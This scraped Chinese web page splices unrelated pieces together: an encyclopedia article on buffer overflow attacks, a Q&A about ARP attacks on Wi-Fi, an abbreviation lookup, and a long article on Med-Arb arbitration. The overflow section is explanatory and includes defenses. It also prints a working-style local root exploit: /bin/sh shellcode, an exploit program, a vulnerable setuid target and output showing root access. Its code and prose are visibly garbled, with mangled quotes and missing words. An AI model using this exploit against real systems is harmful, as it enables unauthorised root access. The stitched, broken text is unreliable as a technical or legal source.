来源:蜘蛛抓取(WebSpider)
时间:2014-12-20 02:27
标签:
无线网总是掉线怎么办
缓冲区溢出攻击_百度百科
缓冲区溢出攻击
本词条缺少名片图,补充相关内容使词条更完整,还能快速升级,赶紧来吧!
溢出攻击是利用缓冲区溢出漏洞所进行的攻击行动。缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击,可以导致程序运行失败、系统关机、重新启动等后果。
溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上。理想的情况是:程序会检查数据长度,而且并不允许输入超过缓冲区长度的字符。但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。操作系统所使用的缓冲区,又被称为“”,在各个操作进程之间,指令会被临时储存在“堆栈”当中,“堆栈”也会出现。
可以利用它执行非授权指令,甚至可以取得系统特权,进而进行各种非法操作。溢出攻击有多种英文名称:buffer overflow,buffer overrun,smash the stack,trash the stack,scribble the stack, mangle the stack, memory leak,overrun screw;它们指的都是同一种攻击手段。第一个缓冲区溢出攻击--Morris,发生在二十年前,它曾造成了全世界6000多台网络瘫痪。
在当前网络与分布式中,被广泛利用的50%以上都是缓冲区溢出,其中最著名的例子是1988年利用fingerd漏洞的蠕虫。而溢出中,最为危险的是,因为入侵者可以利用堆栈溢出,在函数返回时改变返回程序的地址,让其跳转到任意地址,带来的危害一种是程序崩溃导致拒绝服务,另外一种就是跳转并且执行一段,比如得到shell,然后为所欲为。
通过往程序的写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的,使程序转而执行其它指令,以达到攻击的目的。造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。例如下面程序:
void function(char *str) {
char buffer[16]; strcpy(buffer,str);
上面的()将直接把str中的内容copy到buffer中。这样只要str的长度大于16,就会造成buffer的溢出,使程序运行出错。存在像strcpy这样的问题的标准函数还有()、()、()、()、()等。
当然,随便往中填东西造成它溢出一般只会出现分段错误(Segmentation fault),而不能达到攻击的目的。最常见的手段是通过制造缓冲区溢出使程序运行一个用户shell,再通过shell执行其它命令。如果该程序属于root且有suid权限的话,攻击者就获得了一个有的shell,可以对系统进行任意操作了。
缓冲区溢出攻击之所以成为一种常见安全攻击手段其原因在于缓冲区溢出漏洞太普遍了,并且易于实现。而且,缓冲区溢出成为远程攻击的主要手段其原因在于溢出漏洞给予了攻击者他所想要的一切:植入并且执行攻击代码。被植入的攻击代码以一定的权限运行有缓冲区溢出漏洞的程序,从而得到被攻击主机的控制权。
在1998年Lincoln实验室用来评估的的5种远程攻击中,有2种是缓冲区溢出。而在1998年CERT的13份建议中,有9份是是与缓冲区溢出有关的,在1999年,至少有半数的建议是和有关的。在ugtraq的调查中,有2/3的被调查者认为缓冲区溢出漏洞是一个很严重的安全问题。
缓冲区溢出漏洞和攻击有很多种形式,会在第二节对他们进行描述和分类。相应地防卫手段也随者攻击方法的不同而不同,将在第四节描述,它的内容包括针对每种攻击类型的有效的防卫手段。
缓冲区溢出攻击的目的在于扰乱具有某些特权运行的程序的功能,这样可以使得攻击者取得程序的控制权,如果该程序具有足够的权限,那么整个主机就被控制了。一般而言,攻击者攻击root程序,然后执行类似“exec(sh)”的执行代码来获得的shell。为了达到这个目的,攻击者必须达到如下的两个目标:
⒈ 在程序的里安排适当的代码。
⒉ 通过适当的初始化和内存,让程序跳转到入侵者安排的地址空间执行。
根据这两个目标来对溢出攻击进行分类。在二.1节,将描述攻击代码是如何放入被攻击程序的地址空间的。在二.2节,将介绍攻击者如何使一个程序的缓冲区溢出,并且执行转移到攻击代码(这个就是“溢出”的由来)。在二.3节,将综合前两节所讨论的代码安排和控制程序执行流程的技术。
二.1 在程序的地址空间里安排适当的代码的方法
有两种在被攻击程序地址空间里安排攻击代码的方法:
攻击者向被攻击的程序输入一个字符串,程序会把这个字符串放到里。这个字符串包含的资料是可以在这个被攻击的硬件平台上运行的指令序列。在这里,攻击者用被攻击程序的缓冲区来存放攻击代码。缓冲区可以设在任何地方:(stack,)、堆(,动态分配的内存区)和静态资料区。
2、利用已经存在的代码
有时,攻击者想要的代码已经在被攻击的程序中了,攻击者所要做的只是对代码传递一些参数。比如,攻击代码要求执行“exec (bin/sh)”,而在libc库中的代码执行“exec (arg)”,其中arg是一个指向一个字符串的参数,那么攻击者只要把传入的参数指针改向指向“/bin/sh”。
二.2 控制程序转移到攻击代码的方法
所有的这些方法都是在寻求改变程序的执行流程,使之跳转到攻击代码。最基本的就是溢出一个没有边界检查或者其它弱点的,这样就扰乱了程序的正常的执行顺序。通过溢出一个缓冲区,攻击者可以用暴力的方法改写相邻的程序空间而直接跳过了系统的检查。
分类的基准是攻击者所寻求的缓冲区溢出的程序空间类型。原则上是可以任意的空间。实际上,许多的缓冲区溢出是用暴力的方法来寻求改变程序指针的。这类程序的不同之处就是程序空间的突破和内存空间的定位不同。主要有以下三种:
1、活动纪录(Activation Records)
每当一个发生时,调用者会在中留下一个活动纪录,它包含了函数结束时返回的地址。攻击者通过溢出堆栈中的,使返回地址指向攻击代码。通过改变程序的返回地址,当函数调用结束时,程序就跳转到攻击者设定的地址,而不是原先的地址。这类的溢出被称为攻击(Stack Smashing Attack),是目前最常用的攻击方式。
2、(Function Pointers)
函数指针可以用来定位任何。例如:“void (* foo)()”声明了一个为的函数指针变量foo。所以攻击者只需在任何空间内的函数指针附近找到一个能够溢出的缓冲区,然后溢出这个缓冲区来改变函数指针。在某一时刻,当程序通过函数指针调用函数时,程序的流程就按攻击者的意图实现了。它的一个攻击范例就是在Linux系统下的superprobe程序。
3、长跳转(Longjmp buffers)
在C语言中包含了一个简单的检验/恢复系统,称为/longjmp。意思是在检验点设定“setjmp(buffer)”,用“longjmp(buffer)”来恢复检验点。然而,如果攻击者能够进入缓冲区的空间,那么“longjmp(buffer)”实际上是跳转到攻击者的代码。象函数指针一样,longjmp缓冲区能够指向任何地方,所以攻击者所要做的就是找到一个可供溢出的缓冲区。一个典型的例子就是Perl 5.003的缓冲区溢出漏洞;攻击者首先进入用来恢复的的longjmp缓冲区,然后诱导进入恢复模式,这样就使的跳转到攻击代码上了。
二.3代码植入和技术的综合分析
最简单和常见的溢出攻击类型就是在一个字符串里综合了代码植入和活动纪录技术。攻击者定位一个可供溢出的,然后向程序传递一个很大的字符串,在引发缓冲区溢出,改变活动纪录的同时植入了代码。这个是由Levy指出的攻击的模板。因为C在习惯上只为用户和参数开辟很小的缓冲区,因此这种漏洞攻击的实例十分常见。
代码植入和缓冲区溢出不一定要在在一次动作内完成。攻击者可以在一个缓冲区内放置代码,这是不能溢出的缓冲区。然后,攻击者通过溢出另外一个缓冲区来转移程序的指针。这种方法一般用来解决可供溢出的不够大(不能放下全部的代码)的情况。
如果攻击者试图使用已经常驻的代码而不是从外部植入代码,他们通常必须把代码作为参数调用。举例来说,在libc(几乎所有的都要它来连接)中的部分会执行“exec(something)”,其中somthing就是参数。攻击者然后使用缓冲区溢出改变程序的参数,然后利用另一个使程序指向libc中的特定的代码段。
2000年1月,Cerberus 安全小组发布了微软的ⅡS 4/5存在的一个溢出漏洞。攻击该漏洞,可以使Web崩溃,甚至获取超级权限执行任意的代码。微软的ⅡS 4/5 是一种主流的Web服务器程序;因而,该缓冲区溢出漏洞对于网站的安全构成了极大的威胁;它的描述如下:
浏览器向ⅡS提出一个,在域名(或)后,加上一个文件名,该文件名以“.htr”做后缀。于是ⅡS认为客户端正在请求一个“.htr”文件,“.htr”扩展文件被映像成ISAPI(Internet Service API)应用程序,ⅡS会复位向所有针对“.htr”资源的请求到 ISM.DLL程序 ,ISM.DLL 打开这个文件并执行之。
浏览器提交的请求中包含的文件名存储在中,若它很长,超过600个字符时,会导致局部变量,覆盖返回,使ⅡS崩溃。更进一步,在如图1所示的2K缓冲区中植入一段精心设计的代码,可以使之以系统超级权限运行。
缓冲区溢出攻击占了远程的绝大多数,这种攻击可以使得一个匿名的用户有机会获得一台主机的部分或全部的控制权。如果能有效地消除溢出的漏洞,则很大一部分的安全威胁可以得到缓解。
目前有四种基本的方法保护缓冲区免受的攻击和影响。在四.1中介绍了通过操作系统使得缓冲区不可执行,从而阻止攻击者植入攻击代码。在四.2中介绍了强制写正确的代码的方法。在四.3中介绍了利用的边界检查来实现缓冲区的保护。这个方法使得缓冲区溢出不可能出现,从而完全消除了缓冲区溢出的威胁,但是相对而言代价比较大。在四.4中介绍一种间接的方法,这个方法在程序失效前进行完整性检查。虽然这种方法不能使得所有的溢出失效,但它能阻止绝大多数的缓冲区溢出攻击。然后在四.5,分析这种保护方法的兼容性和性能优势。
四.1 非执行的缓冲区
通过使被攻击程序的不可执行,从而使得攻击者不可能执行被植入被攻击程序输入缓冲区的代码,这种技术被称为非执行的缓冲区技术。在早期的系统设计中,只允许程序代码在中执行。但是Unix和MS Windows系统由于要实现更好的性能和功能,往往在数据段中动态地放入可执行的代码,这也是缓冲区溢出的根源。为了保持程序的兼容性,不可能使得所有程序的数据段不可执行。
但是可以设定不可执行,这样就可以保证程序的兼容性。Linux和Solaris都发布了有关这方面的内核补丁。因为几乎没有任何合法的程序会在堆栈中存放代码,这种做法几乎不产生任何兼容性问题,除了在Linux中的两个特例,这时可执行的代码必须被放入堆栈中:
⑴信号传递
Linux通过向进程堆栈释放代码然后引发中断来执行在堆栈中的代码来实现向进程发送Unix信号。非执行的补丁在发送信号的时候是允许缓冲区可执行的。
⑵GCC的在线重用
研究发现gcc在堆栈区里放置了可执行的代码作为在线重用之用。然而,关闭这个功能并不产生任何问题,只有部分功能似乎不能使用。
非执行的保护可以有效地对付把代码植入的缓冲区溢出攻击,而对于其它形式的攻击则没有效果。通过引用一个驻留的程序的,就可以跳过这种保护措施。其它的攻击可以采用把代码植入堆或者段中来跳过保护。
四.2 编写正确的代码
编写正确的代码是一件非常有意义的工作,特别象编写C语言那种风格自由而容易出错的程序,这种风格是由于追求性能而忽视正确性的传统引起的。尽管花了很长的时间使得人们知道了如何编写安全的程序,具有的程序依旧出现。因此人们开发了一些工具和技术来帮助经验不足的程序员编写安全正确的程序。
最简单的方法就是用来搜索中容易产生漏洞的库的调用,比如对和的调用,这两个函数都没有检查输入参数的长度。事实上,各个版本C的标准库均有这样的问题存在。
此外,人们还开发了一些高级的查错工具,如fault injection等。这些工具的目的在于通过人为随机地产生一些溢出来寻找代码的安全漏洞。还有一些工具用于侦测缓冲区溢出的存在。
虽然这些工具帮助程序员开发更安全的程序,但是由于的特点,这些工具不可能找出所有的缓冲区溢出漏洞。所以,侦错技术只能用来减少缓冲区溢出的可能,并不能完全地消除它的存在。
每个帧都对应一个。当函数调用发生时,新的堆栈帧被压入堆栈;当函数返回时,相应的堆栈帧从堆栈中弹出。尽管堆栈帧结构的引入为在高级语言中实现函数或过程这样的概念提供了直接的硬件支持,但是由于将函数返回地址这样的重要数据保存在程序员可见的堆栈中,因此也给系统安全带来了极大的隐患。
历史上最著名的溢出攻击可能要算是日的Morris Worm所携带的攻击代码了。这个因特网利用了fingerd程序的缓冲区溢出漏洞,给用户带来了很大危害。此后,越来越多的缓冲区溢出漏洞被发现。从bind、wu-ftpd、telnetd、等常用服务程序,到Microsoft、等软件厂商提供的应用程序,都存在着似乎永远也弥补不完的缓冲区溢出漏洞。
根据提供的漏洞报告,2002年共发现各种操作系统和应用程序的漏洞1830个,其中缓冲区溢出漏洞有432个,占总数的23.6%. 而绿盟科技评出的2002年严重程度、影响范围最大的十个中,和相关的就有6个。
在读者阅读本文之前有一点需要说明,文中所有示例程序的编译运行环境为gcc 2.7.2.3以及bash 1.14.7,如果读者不清楚自己所使用的编译运行环境可以通过以下命令查看:
$ gcc -vReading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.7.2.3/specsgcc version 2.7.2.3$ rpm -qf /bin/shbash-1.14.7-16
先来看一个下的溢出攻击实例。
#include &&
#include &unistd.h&
extern char **
int main(int argc,char **argv){
char large_string[128];
long *long_ptr = (long *) large_
char shellcode[] = &\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07& &\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d& &\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd& &\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh&;
for (i = 0; i & 32; i++)
*(long_ptr + i) = (int) strtoul(argv[2],NULL,16);
for (i = 0; i & (int) strlen(); i++)
large_string[i] = shellcode[i]; setenv(&KIRIKA&,large_string,1);
(argv[1],argv[1],NULL,environ);
return 0;}
攻击程序exe.c
#include &stdio.h&
#include &stdlib.h&
int main(int argc,char **argv){
char buffer[96];
(&- %p -\\n&,&buffer);
(buffer,(&KIRIKA&));
return 0;}
攻击对象toto.c
将上面两个程序分别编译为可执行程序,并且将改为属主为root的setuid程序:
$ gcc exe.c -o exe$ gcc toto.c -o toto$ suPassword:# chown root.root toto# chmod +s toto# ls -l exe toto-rwxr-xr-x 1 wy os 11871 Sep 28 20:20 exe*-rwsr-sr-x 1 root root 11269 Sep 28 20:20 *# exit
OK,看看接下来会发生什么。首先别忘了用命令验证一下我们的身份。其实继承了UNⅨ的一个习惯,即普通用户的是以$开始的,而的命令提示符是以#开始的。
$ whoamiwy$ ./exe ./toto 0xbfffffff- 0xbffffc38 -Segmentation fault$ ./exe ./toto 0xbffffc38- 0xbffffc38 -bash# whoamirootbash#
第一次一般不会成功,但是我们可以准确得知系统的漏洞所在――0xbffffc38,第二次必然一击毙命。当我们在新创建的shell下再次执行命令时,我们的身份已经是root了!由于在所有UNⅨ系统下的最高目标就是对的追求,因此可以说系统已经被攻破了。
这里我们模拟了一次下缓冲区溢出攻击的典型案例。的属主为root,并且具有setuid属性,通常这种程序是溢出的典型攻击目标。普通用户wy通过其含有恶意攻击代码的程序exe向具有缺陷的toto发动了一次缓冲区溢出攻击,并由此获得了系统的root权限。有一点需要说明的是,如果读者使用的是较高版本的的话,即使通过缓冲区溢出攻击exe得到了一个新的shell,在看到命令的结果后您可能会发现您的权限并没有改变,具体原因我们将在本文最后一节做出详细的解释。不过为了一睹为快,您可以先使用本文 代码包中所带的exe_pro.c作为攻击程序,而不是图1中的exe.c。连上无线网就说wifi存在危险,arp攻击是怎么回事_百度知道
连上无线网就说wifi存在危险,arp攻击是怎么回事
存在一点风险安装一下手机杀毒软件就可以解决金山,腾讯,360,百度手机卫士都可以解决。
其他类似问题
为您推荐:
arp攻击的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁ARB缩写的意思-仲裁_英文缩写查询
英文缩写查询
英文缩写查询
ARB缩写的意思 - 仲裁
ARB(Arbitration) - 仲裁
【英文缩写】ARB
【英文全称】Arbitration
【中文解释】仲裁【缩写类别】仲裁的英文缩写是ARB。
推荐英文缩写
网友正在查
常用查询工具
实用查询工具
日常生活:
站长工具:
学习应用:
民俗娱乐:
电脑网络:
财经商务:
交通旅游:
医疗健康:Med-Arb_百度百科
本词条缺少概述、名片图,补充相关内容使词条更完整,还能快速升级,赶紧来吧!
Med-Arb概述
Med-Arb是指先由调解机构调解后由仲裁机构仲裁来解决争议。
日,中国国际经济贸易仲裁委员会颁布施行了第六套仲裁规则,这也是仲裁委员会现行的仲裁规则。第六套仲裁规则进一步发展了仲裁与调解相结合的制度。在仲裁委员会前五套仲裁规则中,虽然规定了在仲裁程序开始后当事人在仲裁程序进行过程中的调解和仲裁庭之外的调解,但没有规定当事人在仲裁程序开始前所进行的调解如何与仲裁相结合的问题。为了鼓励当事人进行调解,并且通过简易的仲裁途径使得调解所取得的成果能够具有法律上的强制执行力,2000年版的仲裁规则第44条第4款增加规定:
“当事人在仲裁委员会之外通过调解达成和解协议的,可以凭当事人达成的由仲裁委员会仲裁的仲裁协议和他们的和解协议,请求仲裁委员会指定一名独任仲裁员,按照和解协议的内容作出仲裁裁决书”。
仲裁员作出和解裁决前,可以依规则进行审理,并依法确认是否按照和解协议的内容作出仲裁裁决。和解裁决可以在国内外依法强制执行。考虑到这类和解仲裁的案情相对简单,工作量较小,依仲裁规则第88条的规定,其仲裁费可以由仲裁委员会酌情收取。
2000年起,中国国际贸易促进委员会/中国国际商会调解中心向当事人推荐的示范仲裁协议规定,经过中国国际商会各地调解中心调解成达和解协议的,当事人可在和解协议中约定由中国国际经济贸易仲裁委员会指定一名独任仲裁员按照简易程序书面审理,作出仲裁裁决。这种解决争议的办法,简称为MED-ARB 方法,实际上是通过调解机构和仲裁机构的联姻,运用调解和仲裁两种方法,为当事人提供具有终局效力的解决争议的途径。
Med-Arb特点
1、首先由调解机构进行调解。调解机构有成熟的调解规则和适格的调解员,运用娴熟的调解技巧,帮助当事人达成和解。
2、由于当事人达成的和解协议或调解机构制作的调解书在法律上尚无强制执行的效力,为了保障和解协议的强制执行,当事人可能希望和解的最终结果通过裁决书加以确认。为此,他们可以在和解协议中约定按照快捷简易的办法由中国国际经济贸易仲裁委员会进行仲裁,作出和解裁决书。
3、如果当事人约定仲裁,则仲裁委员会可以按照约定受理案件,迅速组成独任仲裁庭,并由独任仲裁庭按照其认为适当的方式快捷地审理案件。由于当事人达成和解所涉内容主要是他们能够自由处分的民事权利义务关系,和解协议相当于当事人建立了新的合同关系,其中所约定的事项已经有效地解决了当事人之间的事实争议和法律争议,所以,仲裁庭的任务变得较为简单,通过审理确认当事人的和解协议是否具有合法性即可作出和解裁决,从而使得当事人的和解协议上升为仲裁裁决,取得法律上强制执行的效力。
中国的MED-ARB允许调解员在调解成功后,在仲裁程序中担任仲裁员。但前提条件是,该调解员必须同时是调解机构调解员名册中的调解员和仲裁机构仲裁员名册中的仲裁员。当事人如果不希望调解员担任仲裁员,则他们可以在和解协议中约定仲裁员名册中的特定人士担任仲裁员,或者约定调解员不担任仲裁员。
仲裁与调解相结合
仲裁与调解概述
“仲裁与调解相结合”是一种复合式的争议解决方法,有广义和狭义之分,广义的“仲裁与调解相结合”泛指仲裁与调解相结合的任何ADR程序。
1、“先调解后仲裁”(Med-Arb)。
其含义是,当事人为解决争议,先启动调解程序,调解不成或调解成功后再进入仲裁程序。
2、“仲裁中调解”(Arb-Med)。
其含义是,当事人为解决争议,先启动仲裁程序,在仲裁程序进行过程中,仲裁员对案件进行调解,调解不成或调解成功后,再恢复进行仲裁程序。
3、“影子调解”(shadow Mediation)。
其含义是,当事人为解决争议,先启动仲裁程序,在仲裁阶段的恰当时候,启动平行的调解程序,由调解员对争议进行调解。如果调解成功,则了结争议;如果调解不成,则争议由仲裁解决。
4、“调解仲裁共存”(Co-Med-Arb)。
这是一种结合了调解,影子调解,小法庭和仲裁诸因素的程序变体。在这种程序中,调解员和仲裁员相分离,但他们都参加法庭听证,仲裁员不参加调解员私下会晤,调解员要向仲裁员披露在调解中所获悉的秘密。随着仲裁程序的发展,调解员旁听全过程,并可在适当时候对当事人进行调解。
5、“仲裁后调解”(Med-Post-Arb).
是指当事人在仲裁程序终结后利用调解程序解决仲裁裁决执行中的问题。由于执行中的调解与仲裁程序的终结之间可能存在时间上的不连贯 ,因而这种方式更接近于独立的调解或临时调解。
关于仲裁的性质,目前学界有四种不同主张,即司法权论、契约论、混合论以及自主论。而关于调解的性质,通常认为只具契约性,也有人认为在一些国家它还具有司法性。作为仲裁与调解的结合,仲裁与调相结合制度的性质就更为复杂。笔者以为,仲裁与调解相结合,犹如仲裁一样,只具有契约性。
首先,从仲裁与调解相结合的起源来看,它具有明显的契约性。在仲裁中进行调解是中国从20世纪开始发展起来的一种争议解决方式,它的出现正是为了适应当事人的需要,可以说,它是许许多多的当事人在意思自治基础上反复、长期实践经验的结晶。
其次,从仲裁与调解相结合的程序来看,它也具有明显的契约性。是否提起仲裁,在仲裁中可否进行调解,仲裁机构的选定,仲裁员和调解员的选任,仲裁员在调解中的角色和作用,程序如何进行,是否达成和解协议等都要由当事人合意决定。并且,当事人还可以约定调解成功或不成功的后续程序如何进行,以及调解过程中当事人和仲裁员的陈述意见、建议和方案等事项在以后的仲裁程序或司法程序中的可采性。总之,与仲裁中与调解有关的各个阶段无一例外地体现了当事人的意思自治,因而具有显著的契约性。
第三,不能因为法律确认了仲裁与调解相结合的制度,便认为它具有司法性。法律对这一制度进行确认的目的,只是借助国家权力来保障这一制度能发挥应有的作用,同时限制它不向背离法律基本原则、社会公共利益的方向倾斜,这与以行使国家权力为特征的司法性并无必然联系[15] 。比如,当事人意思自治是私法领域内各国普遍接受的原则,但对该原则的适用,法律既鼓励、支持,也限制、监督,但不能因此认为该原则具有司法性。必须明确,司法性不同于法律性,前者只关注法的适用,而后者还包括立法。法律之所以规定仲裁与调解相结合的制度,法院之所以支持和监督这一制度,正是在私法领域内,承认并保障当事人在不违背强行及公共政策的前提下,适当行使选择争议解决方式的自由。
第四,仲裁立法和仲裁实践的发展趋势也体现了仲裁与调解相结合制度的契约性。1958年《纽约公约》使弱化法院干预,强化仲裁效益的精神得以确立。在仲裁调解立法方面,以联合国国际贸易法委员会1980年制定的《调解规则》、1985年制定的《国际商事仲裁示范法》为标志,当事人的意思自治受到空前的重视。20世纪60年代兴起的非仲裁地化亦以摆脱仲裁地法院干预,实现完全的当事人意思自治为目的。而自20世纪90年代以来,围绕成为国际仲裁中心的竞争,仲裁立法愈趋自由化,以便为仲裁提供更为宽松、优越的环境。
第五,混合论看似公允,但认为一种法律制度同时具有好几种属性,于逻辑上很难说得通。事物性质指的是该事物的本质属性,一个事物同时具有好几个本质属性,与哲学原理是相矛盾的━事物的本质属性只有一个。
第六,自治论注意到了现代商业需要对于仲裁的巨大促进作用,有其合理的一面。然而,当前大多数的仲裁实践还是在具体的国家法律框架内进行的,游离于国家法律之外的仲裁、调解虽有增长趋势,但还没有形成主流。因此,自治理论尚不足以概括仲裁、调解的全部现实,因而也难以说明仲裁与调解相结合制度的本质特征。
起源和发展
(一)仲裁与调解相结合在中国的起源和发展
仲裁与调解相结合的做法起源于中国,是与中国深厚的调解文化分不开的。早在西周时期,我国便有了关于调解的历史记载。经过漫长的历史演进,中国的调解观念已是根深蒂固,形成了深厚的社会文化积淀。中国国际经济贸易仲裁委员会首创的仲裁与调解相结合的做法,可以说是传统文化和现实需要激情碰撞的结晶,被誉为“东方经验”。
仲裁与调解相结合在中国的起源和发展可分为三个阶段:
第一阶段,20世纪50年代至20世纪70年代末。中国的仲裁,以及在仲裁中进行调解,始于20世纪50年代,由于受苏联模式的深刻影响,1956年的《仲裁程序暂行规则》中没有规定调解。但在仲裁实践中,受中国传统调解文化的影响,调解逐渐被提升至相当高的地位。20世纪70年代,对外经济贸易仲裁委员会又与美国仲裁协会共同创造了“联合调解”的纠纷解决方式,是仲裁史上的又一创举。
第二阶段,20世纪80年代至20世纪末。适应改革开放的需要,1988年,贸促会制定的《仲裁规则》第37条规定可以对仲裁条件进行调解。这是我国首次在仲裁规则中规定调解。94年修订的仲裁规则在仲裁与调解相结合方面增加了若干重要条文。94年颁布的仲裁法首次以法律形式确认和规定了“仲裁与调解”相结合的制度。
第三阶段,2000年10月颁布的第六套仲裁规则进一步发展了仲裁与调解相结合的制度。包括增加规定了当事人在仲裁程序开始前进行的调解如何与仲裁相结合,并且通过简易的仲裁途径使得调解所取得的成果具有了法律上的强制执行力。
(二)仲裁与调解相结合在国外的起源和发展
受法律体系不断完善,法律从业人员不断增加,以及经济纠纷多样化的影响,仲裁不断受到诉讼和调解的冲击;另一方面,由于过于强调正当程序,过于强调其司法性,仲裁如同诉讼一样,“如大象一样笨拙费力,但却没能节省法官半点的才智”,并且也无权将固执的当事人说合。仲裁变得过分缓慢,过分正式僵硬,过分昂贵。 这使得商业交易的当事人感到厌烦并转而寻求替代的纠纷解决方式。调解与仲裁相结合便是其中的一朵“奇葩”。各个国家和地区的立法者都意识到“重视、适应并满足当事人的需求是至关重要的。”从而在各自的立法中对仲裁与调解相结合制度作出了规定。
1、立法规定
(1)英美法系
英美法系对于仲裁中调解的态度主要是受其诉讼理念的影响,英美法关于诉讼的一个基本理念是:法官在诉讼中是独立的公断人。法官Frankel说“普通法法官是从奥林匹亚的山巅以无知审视案件(The common law judge views the case from a peak of Olympian ignorance.)”这种理念要求当事人特别是律师作为诉讼的主导,而法官则是被动接受的中立方,其对案件的介入仅仅是为了判决争议,如果一个法官不与案件保持一定距离,而是积极介入诉讼过程的话,他将很有可能被怀疑是存有偏见。因此,那种在大陆法系盛行的由法官调解案件的做法在英美法系的法官看来是不可思议的。
英美法的这种诉讼理念对仲裁影响甚深,因为他们将仲裁与诉讼归为一类,认为两者在本质上都具有对抗性;都是第三方将解决方案加于双方当事人;都有正式性的规则,尽管仲裁的正式性相对来说要弱的多;而且最后的结果都具有法律强制力。所以,在英美法系的大多数国家,仲裁员都被看作是更像法官,他们也应该与案件保持一定距离,应该被动接受而不是积极介入,更不可能进行调解了。因此,在英美法系国家,仲裁中调解遇到的阻力比较大。特别是在英国和美国两个普通法传统浓厚的国家。
但是,值得一提的是,英美法系的诉讼理念正在发生着变化,开始由当事人主导诉讼向偏重法官控制诉讼转变,原因是传统的当事人主导诉讼模式具有某些难以避免的弊端。这种趋势在大陆法系也存在,并被法国学者称为当事人主义的衰落。
这种诉讼理念的变化也给仲裁中调解带来了发展的契机。传统上对仲裁员进行调解持反对态度的一些普通法国家,态度正在发生积极的变化。目前明文规定仲裁员可以在仲裁过程中进行调解的国家和法律有:加拿大1991年《仲裁法案》第35条第1款和第2款; 澳大利亚1990年《新南威尔士商事仲裁法》第27条;香港1990年《仲裁条例》;新加坡1994年《国际仲裁法》第16条第3款;印度1996年《仲裁和调解法》第80条;以及百慕大1993年《国际调解和仲裁法》第14条。除此之外,一些国家的仲裁机构所推荐的仲裁规则中也有相应的规定。
传统上对法官和仲裁员进行调解持反对态度的一些普通法国家,近来态度却发生了积极的变化。如1993年和1999年英国商事法院发布的指导性的司法陈述(Practice statement),鼓励当事人以诉讼的方式来了结案件。尤其值得一提的是印度1996年制定的《仲裁与调解法》,该法第80条规定,仲裁员在当事人同意的情况在仲裁中可以调解案件。
(2)大陆法系
与英美法系一样,大陆法系对于仲裁中调解的态度也受到其诉讼理念的影响。但两者的诉讼理念是不同的,“大陆法系的诉讼是在法官的积极介入下进行的,法官不是沉默的判定者,仅仅在诉讼终结时给出他的最终结论;相反,他代表一种家长式的权威,从他自己的意愿和观点出发在整个诉讼中进行介入”。因此,许多大陆法系国家的法官在诉讼中都可以对当事人双方进行调解。如德国法律就规定了法官在诉讼进行的各个阶段都有促使当事人和解的权力和义务。法国的法律也明确规定了法官负有调解职能。其他诸如瑞士、瑞典、奥地利、土耳其、墨西哥等国家的法律中都有类似的规定。
在这种诉讼理念的影响下,大陆法系的许多国家对于仲裁中调解的态度比较宽容。如德国的仲裁机构建议的大多数仲裁规则中都规定了仲裁员在仲裁过程中进行调解的职责。其他如奥地利、瑞士、瑞典、土耳其、墨西哥、以及波兰等国家都有着在仲裁进行调解的实践,但唯一以法律明文规定这一做法的国家目前只有荷兰的1986年《仲裁法》,其在1043条明确规定了仲裁员可以尝试进行调解。
(3)国际组织
《联合国贸法委员会国际商事调解示范法》在第12条“调解人担任仲裁员”中明确规定:“除非当事人另有约定,调解人不应当担任对于曾经是或目前是调解程序标的事项的争议或者由于同一合同或法律关系或任何与其有关的合同或法律关系引起的另一争议的仲裁员。”这条规定虽然是以当事人有约定为条件的,但与1980年联合国贸法委员会调解规则第19条明确反对仲裁中调解相比,这无疑是一大进步。并且以当事人约定为条件,也符合仲裁中调解的意思自治性。
世界知识产权组织(WIPO)仲裁中心的调解规则第13条(b)款第4项也规定:“在当事人明确同意之下,调解员可以作为独任仲裁员进行仲裁,调解员在仲裁程序中可以对其在调解程序中了解到的情况加以考虑”。
国际律师协会公布的《国际仲裁员道德规则》第8条“参与和解建议”项下也规定了仲裁庭可以向双方当事人同时提出和解方案。
2、仲裁规则
世界上各仲裁机构对仲裁与调解相结合的态度不尽相同。有的明确规定仲裁员有权对同一争议进行调解,如印度仲裁院的仲裁规则第42条允许先调解后仲裁的纠纷解决方式。有的仲裁规则只是一般性的将调解作为解决争议的一种可能方式,但并没有规定具体的调解方式,如美国仲裁协会《商事仲裁规则》。有的仲裁规则规定,仲裁员可以用最经济的办法来解决争议,如瑞典《斯德哥尔摩商会仲裁院仲裁规则》。尽管具体规定各不相同,但各仲裁规则几乎都实际上允许仲裁员担任调解员。
一种新的纠纷解决方式之所以能够存在,肯定是有着其他纠纷解决方式所不可比拟的优越性。换言之,正是由于某种纠纷解决方式有着独特的功能,才使得它能够得以产生发展。仲裁与调解相结合也不例外。
仲裁与调解作为仲裁方法的扩展,其价值目标与仲裁的价值目标有重叠之处,但又有所不同。仲裁与调解相结合除具有仲裁的基本价值--公正、效益之外。它还具有“安定”的价值。
所谓“安定”,是指生活或形势平静、正常、稳定。仲裁与调解相结合允许以和解协议解决当事人之间复杂的法律争议,在当事人之间建立合意,满足双方的经济利益。由于体现了双方的自愿,和解能够激发当事人履行协议的诚意,从而保证了调解结果的相对稳定性。从更深远的意义来讲,和解超出了纯粹的法律和经济范畴,它能够合理扩张,延伸到单纯的仲裁难以触及的人际关系和社会关系领域,有效地保持和促进当事人之间的合作关系,增加远期利益,在当事人之间以至社会上形成了更为广阔的安定局面。正如一位学者指出的那样,仲裁与调解相结合,实现了“当事人意思自治与国家法律的统一,眼前利益与长远利益的统一,合乎法律与合乎情理的统一。”
(一)赞成仲裁与调解相结合的理论观点
这种观点认为,如果调解的尝试早期失败,或者调解人对争议的了解与其说是可能和解的不利条件,不如说是一种财富,调解员调解不成充任仲裁员有利于减少不必要的费用和加快争议的最终解决。
这种观点认为仲裁与调解相结合会产生良好效益,而单纯的仲裁要花费太多的时间和精力。
